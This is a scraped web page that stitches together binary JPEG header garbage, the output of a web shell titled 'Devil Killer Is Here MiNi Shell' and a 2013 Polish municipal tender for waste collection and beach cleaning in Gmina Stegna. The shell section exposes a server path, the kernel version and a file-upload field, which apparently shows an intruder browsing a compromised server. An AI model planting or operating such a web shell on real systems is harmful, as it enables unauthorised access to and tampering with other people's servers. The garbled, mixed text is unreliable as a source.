JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130305/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130305/33903-N-2013.html

<p class="kh_header"><b>Stegna: Wywóz odpadów i utrzymanie porządku na terenie gminy Stegna</b><br>
<b>Numer ogłoszenia: 33903 - 2013; data zamieszczenia: 05.03.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Gminy w Stegnie , ul. Gdańska 34/6, 82-103 Stegna, woj. pomorskie, tel. 055 2478171, faks 055 2478395.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> stegna.ug.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wywóz odpadów i utrzymanie porządku na terenie gminy Stegna.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Szczegółowy zakres prac.

Wykonawca przyjmuje do wykonania prace związane z wywozem nieczystości stałych i utrzymania porządku na terenie Gminy Stegna:

1.	Wywóz nieczystości stałych:

Wywóz odpadów komunalnych z terenu Gminy Stegna w terminie od 20.03.2013 r. do 31.12.2014 r. odbywał się będzie w godzinach rannych do godziny 800 .

a)	Przystanki komunikacyjne:

Ilość pojemników: 15 szt. o pojemności 0,05 m3 każdy

Ponadto na przystankach komunikacyjnych na terenie całej gminy będą wystawiane worki ze śmieciami zebranymi z terenów komunalnych przez pracowników Zamawiającego. Wywóz wystawionych worków z odpadami odbywać się będzie w ramach dodatkowej puli odpadów przewidzianych do wywozu w SIWZ.

Częstotliwość wywozu: 3 razy w tygodniu (poniedziałek, środa, piątek)

Ilość wywozów w 2013 r. - 125 razy	0,75 m3 x 125 = 93,75 m3
Ilość wywozów w 2014 r. - 157 razy	 0,75 m3 x 157 = 117,75 m3

b)	Kosze uliczne:

-  Stegna:        41 szt. o poj. 0,05 m3 każdy	41 x 0,05 m3 = 2,05 m3
                        43 szt. o poj. 0,06 m3 każdy	 43 x 0,06 m3  = 2,58 m3
							razem: 4,63 m3

      Częstotliwość wywozu: 

2013 rok. - od 20.03 do 31.03  oraz od 16.10 do 31.12 - 1 raz w tyg. (pon.)
                         od 01.04 do 28.06 oraz od 01.09 do 15.10 - 3 razy w tyg. (pon., śr., piąt.)
                        od 29.06 do 31.08 - codziennie
      
Ilość wywozów - 135 razy x 4,63 m3 = 625,05 m3

Dodatkowy wywóz popołudniowy z ulic Gdańska, Lipowa i Morska 
w okresie od 29.06 do  31.08 - 
                        43 szt. o poj. 0,06 m3 każdy	 43 x 0,06 m3 = 2,58 m3
 
Ilość wywozów - 64 razy x 2,58 m3 = 165,12 m3

2014 rok -  od 01.01 do 31.03 oraz od 16.10 do 31.12 - 1 raz w tyg. (pon.)
                            od 01.04 do 27.06 oraz od 01.09 do 15.10 - 3 razy w tyg. (pon., śr., piąt.)
                            od 28.06 do 31.08 - codziennie
       
 Ilość wywozów - 147 razy x 4,63 m3 = 680,61 m3

Dodatkowy wywóz popołudniowy z ulic Gdańska, Lipowa i Morska
w okresie od 28.06 do 31.08 -
                          43 szt. o poj. 0,06 m3 każdy	 43 x 0,06 m3 = 2,58 m3

         Ilość wywozów - 65 razy x 2,58 m3 = 167,70 m3

- Jantar:          19 szt. o poj. 0,05 m3 każdy	 19 x 0,05 m3 = 0,95 m3
                        11 szt. o poj. 0,06 m3 każdy	 11 x 0,06 m3 = 0,66 m3
							razem: 1,61 m3
        
Częstotliwość wywozu:    

2013 r. - od 20.03 do 31.03  oraz od 16.10 do 31.12 - 1 raz w tyg. (pon.)
                         od 01.04 do 28.06 oraz od 01.09 do 15.10 - 3 razy w tyg. (pon., śr., piąt.)
                        od 29.06 do 31.08 - codziennie

               Ilość wywozów: 135 razy x 1,61 m3 = 217,35 m3

Dodatkowy wywóz popołudniowy z ulic Gdańska i Morska 
       w okresie od 29.06 do  31.08

                          16 szt. o poj. 0,05 m3 każdy	 16 x 0,05 m3 = 0,80 m3
                          11 szt. o poj. 0,06 m3 każdy	 11 x 0,06 m3 = 0,66 m3
							razem: 1,46 m3

Ilość wywozów - 64 razy x 1,46 m3 = 93,44 m3

2014 rok -  od 01.01 do 31.03 oraz od 16.10 do 31.12 - 1 raz w tyg. (pon.)
                            od 01.04 do 27.06 oraz od 01.09 do 15.10 - 3 razy w tyg. (pon., śr., piąt.)
                            od 28.06 do 31.08 - codziennie

Ilość wywozów - 147 razy x 1,61 m3 = 236,69 m3

Dodatkowy wywóz popołudniowy z ulic Gdańska i Morska
w okresie od 29.06 do 31.08 -
                          16 szt. o poj. 0,05 m3 każdy	 16 x 0,05 m3 = 0,80 m3
                          11 szt. o poj. 0,06 m3 każdy	 11 x 0,06 m3 = 0,66 m3
							razem: 1,46 m3
 
Ilość wywozów - 65 razy x 1,46 m3 = 94,90 m3

- Junoszyno -  1 szt. o poj. 0,05 m3 
Częstotliwość wywozu:

2013 r. - od 20.03 do 31.03  oraz od 16.10 do 31.12 - 1 raz w tyg. (pon.)
                         od 01.04 do 28.06 oraz od 01.09 do 15.10 - 3 razy w tyg. (pon., śr., piąt.)
                        od 29.06 do 31.08 - codziennie

Ilość wywozów: 135 razy x 0,05 m3 = 6,75 m3

2014 rok -  od 01.01 do 31.03 oraz od 16.10 do 31.12 - 1 raz w tyg. (pon.)
                            od 01.04 do 27.06 oraz od 01.09 do 15.10 - 3 razy w tyg. (pon., śr., piąt.)
                            od 28.06 do 31.08 - codziennie

Ilość wywozów - 147 razy x 0,05 m3 = 7,35 m3

- Mikoszewo - 10 szt. o poj. 0,06 m3 każdy	 10 x 0,06 m3 = 0,6 m3
                         10 szt. o poj. 0,05 m3 każdy	 10 x 0,05 m3 = 0,5 m3
							razem: 1,1 m3

Częstotliwość wywozu:
       
2013 r od 20.03 do 31.03  oraz od 16.10 do 31.12 - 1 raz w tyg. (pon.)
           od 01.04 do 28.06 oraz od 01.09 do 15.10 - 3 razy w tyg. (pon., śr., piąt.)
           od 29.06 do 31.08 - codziennie

 Ilość wywozów: 135 razy x 1,1 m3 = 148,50 m3

2014 rok -  od 01.01 do 31.03 oraz od 16.10 do 31.12 - 1 raz w tyg. (pon.)
                            od 01.04 do 27.06 oraz od 01.09 do 15.10 - 3 razy w tyg. (pon., śr., piąt.)
                            od 28.06 do 31.08 - codziennie

Ilość wywozów - 147 razy x 1,1 m3 = 161,70 m3

- Drewnica - 4 szt. o poj. 0,06 m3 każdy	 4 x 0,06 m3 = 0,24 m3
 
Częstotliwość wywozu:

2013 r. - od 20.03 do 31.12  - 3 razy w tyg. (pon., śr., piąt.)

Ilość wywozów: 125 razy x 0,24 m3 = 30 m3

2014 rok -  od 01.01 do 31.12 - 3 razy w tyg. (pon., śr., piąt.)

Ilość wywozów - 157 razy x 0,24 m3 = 37,68 m3

  - Żuławki - 6 szt. o poj. 0,05 m3  	 6 x 0,05 m3 = 0,3 m3

 Częstotliwość wywozu:

2013 r. - od 20.03 do 31.12  - 3 razy w tyg. (pon., śr., piąt.)

Ilość wywozów: 125 razy x 0,3 m3 = 37,50 m3

2014 rok -  od 01.01 do 31.12 - 3 razy w tyg. (pon., śr., piąt.)

Ilość wywozów - 157 razy x 0,3 m3 = 47,1 m3

Wywóz nieczystości stałych, odbywać się musi sprzętem specjalistycznym i polegać ma na opróżnianiu ulicznych koszy na śmieci, zbieraniu worków ze śmieciami, które będą wystawiane przy koszach ulicznych oraz na poboczach dróg, przystankach autobusowych w miejscowościach Mikoszewo (3 przystanki), Żuławki (3 przystanki), Dworek (Stróża 3 przystanki,) Drewnica (1przystanek), Przemysław (2 przystanki), Izbiska (1 przystanek), Dworek (2 przystanki), Niedźwiedziówka (1 przystanek)Stare Babki (2 przystanki), Bronowo ( 1 przystanek), Broniewo (1 przystanek),Stegienka Osada (1 przystanek), Wiśniówka (1 przystanek), Szkarpawa (1 przystanek), Wybicko (2 przystanki), Książęce Żuławy (2 przystanki), Jantar (5 przystanków), Jantar Leśniczówka (2 przystanki), Junoszyno (7 przystanków), Stegienka (1 przystanek), Głobica (1 przystanek), Chełmek Osada (1przystanek),Chorążówka (1 przystanek), Stegna (dworzec + 4 przystanki),Popowo (2 przystanki), Rybina (3 przystanki), Tujsk (2 przystanki), Stobiec (2 przystanki),Świerznica (2 przystanki) oraz innych miejsc na terenie Gminy Stegna. 

c)	Odbieranie odpadów dodatkowo zebranych przez Zamawiającego według potrzeb na każdorazowe zgłoszenie w ilości:
- 2013 rok - 300 m3 
- 2014 rok - 300 m3 

c) 	Pojemniki do segregacji.
Wykonawca zobowiązany jest do ustawienia 6  zestawów do segregacji (szkło, plastik, makulatura) typu Dzwon (własność Wykonawcy)  w następujących miejscowościach: 
Stegna 1 szt., Jantar 1 szt., Mikoszewo 1 szt., Drewnica 1 szt., Żuławki 1 szt., Rybina 1 szt. Odbieranie odpadów odbywać się będzie nieodpłatnie na każdorazowe zgłoszenie Zamawiającego w ilości:
- 2013 rok - 100 m3 
- 2014 rok - 100 m3 

2. Utrzymanie porządku:

I. Martwe zwierzęta.
            Wykonawca  zapewni zbieranie i transport do zakładów utylizacji zwłok 
            bezdomnych zwierząt lub ich części.

II. Sprzątanie ulic i chodników.
             W okresie obowiązywania umowy wskazane ulice i chodniki należy sprzątać
              efektywnie - tak aby nie zalegał na nich piasek, nie rosły chwasty oraz nie 
              znajdowały się na nich inne zanieczyszczenia. 
              W/w ulice należy sprzątać wraz z chodnikiem ( jeżeli występuje ) i poboczem
              z opakowań  plastikowych,  makulatury, opakowań szklanych oraz 
              innych odpadów na całej szerokości wraz z poboczem w godzinach
              rannych.

Częstotliwość sprzątania ulic:
W okresie od 20.03 do 17.06 i od 16.09 do 30.11 w każdym roku obowiązywania umowy dwa raz w miesiącu. 
W okresie od 17.06 do 15.09 w każdym roku obowiązywania umowy jeden raz w tygodniu.
2013 rok - 24 sprzątania
2014 rok - 24 sprzątania

Mikoszewo

Lp.	Nazwa ulicy	Długość ulicy w m.	Długość chodnika w m.
1	ul. Gdańska	----------	1900
2	ul. Wiślana	100	

Jantar

Lp.	Nazwa ulicy	Długość ulicy w m.	Długość chodnika w m.
1	Morska	1154	1504
2	Rybacka	2150	4300
3	Bursztynowa	  640	800
4	Gdańska	-------	1850
5	Promenada	-------	  300
6	Dojście do plaż nr 79, 80	-------	  350
	Razem	3944	9104

Stegna

Lp.	Nazwa ulicy	Długość ulicy w m.	Długość chodnika w m.
1	Morska	2266	2770
2	Lipowa	1437	2874
3	Powstańców W- wy	1500	3000
4	Jagiełły	 800	------
5	Sikorskiego	 600	------
6	Kościuszki	  330	  660
7	Wojska Polskiego	  430	  580
8	Grunwaldzka	 740	  550
9	Gdańska	2100	3000
10	Promenada	-------	  200
11	Kwiatowa	 170	------
12	Jaśminowa	 150	------
13	Słoneczna	 180	------
14	Zacisze	 110	------
15	Dworcowa	   90	------
16	Elbląska	 300	   300
17	Jana Długosza	 140	-------
18	Bursztynowa	   50	-------
19	Pętla autobusowa(dworzec)	200	200
20	Ciąg pieszy od pętli autobusowej do szkoły	--------	200
	Razem	11593	14334


	Ogólna powierzchnia sprzątania	15637	25338

3. Szczegółowy zakres prac dotyczący wywozu nieczystości stałych i utrzymania czystości i porządku na terenie plaż Gminy Stegna.


Wykonawca przyjmuje do wykonania usługę w zakresie zabezpieczenia pojemników (o poj. 110 l) na plażach i terenach przyplażowych Gminy Stegna oraz opróżniania i wywozu  nieczystości :

a)	W miejscowości  Mikoszewo należy ustawić 10 pojemników. Pojemnik należy ustawić na plaży w rejonie zejść 90, 89, 88, 87 i 86. 
W okresie letnim od 29 kwietnia do 21 czerwca (50 % pojemników) wywóz nieczystości odbywać się będzie dwa razy w tygodniu w poniedziałki
 i piątki do godziny 9°°. Ilość odebranych odpadów wyniesie około 8,8 m3. 
Od 22 czerwca do 01 września (100% pojemników) wywóz nieczystości odbywać się będzie codziennie  w godz. 6°°- 8°°. Ilość odebranych odpadów wyniesie około 79,2 m3. 
Od 02 września do 30 września (50 % pojemników) wywóz nieczystości odbywać się będzie dwa razy w tygodniu w poniedziałki i piątki do godziny 9°°.
Ilość odebranych odpadów wyniesie około 5,0 m3. 

b)	W miejscowości Jantar należy  ustawić 30 pojemników. Pojemniki należy ustawić na plaży o długości około 600 metrów. 
Od zejścia nr 80 (przy wieży) 100 metrów w kierunku zachodnim  i 500 metrów w kierunku wschodnim z pominięciem terenu przystani rybackiej. Pojemniki należy ustawić również w rejonie zejść 81, 82, 83, 77 i 78.
W okresie letnim od 29 kwietnia do 21 czerwca (50 % pojemników) wywóz nieczystości odbywać się będzie dwa razy w tygodniu w poniedziałki
 i piątki do godziny 9°°. Ilość odebranych odpadów wyniesie około 26,4 m3. 
Od 22 czerwca do 01 września (100% pojemników) wywóz nieczystości odbywać się będzie codziennie  w godzinach 600 - 8°°. Ilość odebranych odpadów wyniesie około 237,6 m3.
Od 02 września do 30 września (50 % pojemników) wywóz nieczystości odbywać się będzie dwa razy w tygodniu w poniedziałki i piątki do 
godziny 9°°. Ilość odebranych odpadów wyniesie około 15,0 m3.

c)	W miejscowości Junoszyno należy ustawić 8 pojemników. Pojemniki należy ustawić na plaży w rejonie zejść  nr 73, 74, 75 i 76. 
W okresie letnim od 29 kwietnia do 21 czerwca (50 % pojemników) wywóz nieczystości odbywać się będzie dwa razy w tygodniu w poniedziałki
 i piątki do godziny 9°°. Ilość odebranych odpadów wyniesie około 7,4 m3.
 Od 22 czerwca do 01 września (100% pojemników) wywóz nieczystości odbywać się będzie codziennie  w godzinach 600 - 800. Ilość odebranych odpadów wyniesie około 63,4 m3.
Od 02 września do 30 września (50 % pojemników) wywóz nieczystości odbywać się będzie dwa razy w tygodniu w poniedziałki i piątki do 
godziny 9°°. Ilość odebranych odpadów wyniesie około 4,0 m3.

d)	W miejscowości Stegna należy ustawić 50 pojemników. Pojemniki należy ustawić na plaży o długości około 900 metrów. Od zejścia nr 69 (Lipowa) 200 metrów w kierunku zachodnim i 200 metrów w kierunku wschodnim. Od  zejścia nr 68 ( wejście główne)  200 metrów w kierunku zachodnim i 300 metrów w  kierunku wschodnim. Pojemniki należy ustawić również w rejonie zejść  nr 64, 65, 66, 67, 70, 71 i 72. 
W okresie letnim od 29 kwietnia do 21 czerwca (50 % pojemników) wywóz nieczystości odbywać się będzie dwa razy w tygodniu w poniedziałki
 i piątki do godziny 9°°. Ilość odebranych odpadów wyniesie około 44,0 m3.
Od 22 czerwca do 01 września (100% pojemników) wywóz nieczystości odbywać się będzie codziennie  w godzinach 600 - 800. Ilość odebranych odpadów wyniesie około 396,0 m3.
Od 02 września do 30 września (50 % pojemników) wywóz nieczystości odbywać się będzie dwa razy w tygodniu w poniedziałki i piątki do 
godziny 9°°. Ilość odebranych odpadów wyniesie około 25,0 m3.

e)	W miejscowości Jantar Leśniczówka na plaży należy ustawić 4 pojemniki w rejonie zejść  nr 85, 84. 
W okresie letnim od 29 kwietnia do 21 czerwca (50 % pojemników) wywóz nieczystości odbywać się będzie dwa razy w tygodniu w poniedziałki
 i piątki do godziny 9°°. Ilość odebranych odpadów wyniesie około 3,5 m3. 
Od 22 czerwca do 01 września (100% pojemników) wywóz nieczystości odbywać się będzie codziennie  w godzinach 600 - 800. Ilość odebranych odpadów wyniesie około 31,7 m3.
Od 02 września do 30 września (50 % pojemników) wywóz nieczystości odbywać się będzie dwa razy w tygodniu w poniedziałki i piątki do 
godziny 9°°. Ilość odebranych odpadów wyniesie około 2,0 m3.

Bronowanie plaży należy wykonywać raz w miesiącu w okresie od początku kwietnia do końca sierpnia w czasie korzystnych warunków atmosferycznych. Bronowanie w kwietniu należy wykonać broną ciężką. W pozostałych miesiącach broną lekką.
Częstotliwość bronowania; 5 razy w każdym roku umowy.
Powierzchnia bronowania:
- Mikoszewo 1500 mb.
- Jantar 1500 mb.
- Junoszyno 1000 mb.
- Stegna 1500 mb.

Szacowana ilość odpadów w 2013 r. - 2665,55 m3
Szacowana ilość odpadów w 2014 r. - 2799,55 m3.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień uzupełniających, o których mowa w art. 67 ust. 1 pkt. 6 i 7 Prawa zamówień publicznych.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 90.51.10.00-2, 90.60.00.00-3, 90.91.00.00-9, 90.68.00.00-0, 90.61.00.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2014.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	Przystępując do niniejszego postępowania każdy Wykonawca zobowiązany jest wnieść wadium w wysokości 1.000,00 zł (słownie złotych: jeden tysiąc złotych 00100).
2.	Wadium należy wnieść w jednej lub kilku formach przewidzianych w art. 45 ust. 6 ustawy, tj.:
a)	pieniądzu,
b)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
c)	gwarancjach bankowych,
d)	gwarancjach ubezpieczeniowych,
e)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6 b ust. 5 pkt. 2 ustawy z dna 9 listopada 2000r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109 poz. 1158 ze zm.).
3.	Wykonawca zobowiązany jest wnieść wadium przed upływem terminu składania ofert.
4.	Wadium w pieniądzu należy wnieść przelewem na konto Zamawiającego:
Bank Spółdzielczy w Stegnie
Nr 33 8308 0001 0000 0550 2000 0070
5.	W przypadku wadium wnoszonego w pieniądzu, jako termin wniesienia wadium przyjęty zostaje termin uznania kwoty na rachunku Zamawiającego.
6.	W przypadku wniesienia wadium w formie innej niż pieniądz- oryginał dokumentu potwierdzającego wniesienie wadium należy złożyć przed upływem terminu składania ofert w siedzibie Zamawiającego - ul. Gdańska 34 w pok. nr 9 lub zamieścić w osobnej kopercie opisanej wadium, dołączonej do oferty.
7.	Nie wniesienie wadium do upływu terminu składania ofert, na przedłużony okres związania ofertą lub w terminie, o którym mowa w art. 46 ust. 3 albo brak zgody na przedłużenie okresu zawiązania ofertą spowoduje wykluczenie Wykonawcy na podstawie art. 24 ust. 2 pkt. 2 ustawy, a jego oferta zostanie uznana za odrzuconą na podstawie art. 24 ust. 4 ustawy.
8.	Wadium wniesione w formach, o których mowa w pkt. 2 ppkt. 2 - 5 musi posiadać okres ważności nie krótszy niż okres związania ofertą.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a.	Wykonawca spełni warunek dotyczący posiadania uprawnień do wykonywania określonej działalności lub czynności jeżeli przepisy nakładają obowiązek ich posiadania jeśli posiada zaświadczenie o wpisie do rejestru działalności regulowanej z zakresu gospodarki odpadami komunalnymi z terenu Gminy Stegna.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>b.	Wykonawca spełni warunek dotyczący sytuacji ekonomicznej i finansowej jeśli posiada aktualne ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

